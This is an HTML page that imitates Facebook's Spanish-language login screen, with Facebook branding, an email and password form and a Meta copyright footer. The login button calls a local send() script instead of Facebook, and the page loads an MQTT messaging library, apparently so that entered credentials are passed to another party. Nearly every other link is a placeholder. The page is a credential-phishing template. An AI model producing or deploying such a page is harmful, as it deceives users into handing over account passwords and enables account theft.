<!DOCTYPE html>
<html>
<head>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.js" type="text/javascript"></script>
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title>Facebook - Inicia sesión</title>
	<link rel="shortcut icon" href="/static/images/logo-fb.png">
	<link rel="stylesheet" type="text/css" href="/static/css/index.css">
</head>
<body>
	<div class="c1">
    	<div class="container" id="c2">
        	<div class="row">
            	<div class="col-sm-12 col-md-6">
                	<div class="c3">
                    	<p1 id="p1">facebook</p1><br />
                    	<p2 id="p2">Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.</p2>
                	</div>
            	</div>
            	<div class="col-sm-12 col-md-6">
                	<div class="c4">
						<form id="f1">
  					 	<p><input class="form-control" id="email" type="email" name="email" placeholder="Correo electrónico o número de teléfono"></p>
    					<p><input class="form-control" id="password" type="password" name="password" placeholder="Contraseña"></p>
  						<p><input type="button" class="btn btn-primary btn-block" id="enter" value="Iniciar sesión" onclick="send();"></p>
  						<p><a href="javascript:alert('Olvidaste tu contraseña');">¿Olvidaste tu contraseña?</a></p>
  						<hr>
  						<p><input type="button" class="btn btn-success" id="new" value="Crear cuenta nueva" onclick="javascript:alert('Crear cuenta nueva');"></p>
						</form>
                	</div>
                	<br />
                	<div class="c5">
						<p><a id="a1" href="javascript:alert('Crea una página');">Crea una página</a> para un personaje público, un grupo de música o un negocio.</p>
                	</div>
            	</div>
        	</div>
    	</div>
	</div>

    <div class="c6">
    	<div class="container">
    		<br />
    		<p>
    			<a id="a2" href="#">Español</a>
    			<a id="a2" href="#">English (US)</a>
    			<a id="a2" href="#">Italiano</a>
    			<a id="a2" href="#">Français (France)</a>
    			<a id="a2" href="#">Português (Brasil)</a>
    			<a id="a2" href="#">中文(简体)</a>
    			<a id="a2" href="#">Русский</a>
    			<a id="a2" href="#">العربية</a>
    			<a id="a2" href="#">हिन्दी</a>
    			<a id="a2" href="#">日本語</a>
				<input type="button" value="+">
    		</p>
    		<hr>
    		<p id="p4">
    			<a id="a2" href="#">Registrarte</a>
    			<a id="a2" href="#">Iniciar sesión</a>
    			<a id="a2" href="#">Messenger</a>
    			<a id="a2" href="#">Facebook Lite</a>
    			<a id="a2" href="#">Watch</a>
    			<a id="a2" href="#">Lugares</a>
    			<a id="a2" href="#">Juegos</a>
    			<a id="a2" href="#">Marketplace</a>
    			<a id="a2" href="#">Facebook Pay</a>
    			<a id="a2" href="#">Empleos</a>
    			<a id="a2" href="#">Oculus</a>
    			<a id="a2" href="#">Portal</a>
    			<a id="a2" href="#">Instagram</a>
    			<a id="a2" href="#">Local</a>
    			<a id="a2" href="#">Recaudaciones de fondos</a>
    			<a id="a2" href="#">Servicios</a>
    			<a id="a2" href="#">Centro de información de votación</a>
    			<a id="a2" href="#">Información</a>
    			<a id="a2" href="#">Crear anuncio</a>
    			<a id="a2" href="#">Crear página</a>
    			<a id="a2" href="#">Desarrolladores</a>
    			<a id="a2" href="#">Empleo</a>
    			<a id="a2" href="#">Privacidad</a>
    			<a id="a2" href="#">Cookies</a>
    			<a id="a2" href="#">Opciones de anuncios</a>
    			<a id="a2" href="#">Condiciones</a>
    			<a id="a2" href="#">Ayuda</a>
    			<a id="a2" href="#">Configuración</a>    			
    		</p>
    		<p id="a2">Meta © 2022</p>
    	</div>
    </div>
    <script type="text/javascript" src="/static/js/index.js"></script>
</body>
</html>